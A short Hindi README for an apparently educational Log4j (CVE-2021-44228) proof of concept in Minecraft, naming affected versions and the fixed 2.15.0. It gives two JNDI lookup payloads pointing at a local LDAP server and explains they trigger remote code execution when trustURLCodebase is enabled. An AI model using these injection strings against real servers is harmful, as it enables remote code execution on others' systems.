
Minecraft में Log4j भेद्यता (CVE-2021-44228) के लिए एक शैक्षिक प्रूफ ऑफ कॉन्सेप्ट
यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है।
यह लॉग4जे आरसीई का एक प्रूफ ऑफ कॉन्सेप्ट है जिसे HyCraftHD से अनुकूलित किया गया है।
यहाँ CVE-2021-44228 के लिए कुछ लिंक हैं:
यह बग लगभग सभी log4j2 और शायद log4j1 संस्करणों को प्रभावित करता है। उपयोग करने के लिए अनुशंसित संस्करण 2.15.0 है जो एक्सप्लॉइट को ठीक करता है।
${jndi:ldap://127.0.0.1/e} पेस्ट करें। यदि पोर्ट 389 पर एक खुला सॉकेट है तो logj4 कनेक्ट करने का प्रयास करता है और टाइमआउट होने तक आगे संचार को ब्लॉक करता है।THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! लॉग करेगा जो ldap सर्वर से एक सीरियलाइज़्ड स्ट्रिंग ऑब्जेक्ट है।
${jndi:ldap://127.0.0.1/exe} पेस्ट करें। यदि -Dcom.sun.jndi.ldap.object.trustURLCodebase=true को true पर सेट किया जाता है तो रिमोट कोड एक्सीक्यूशन होगा।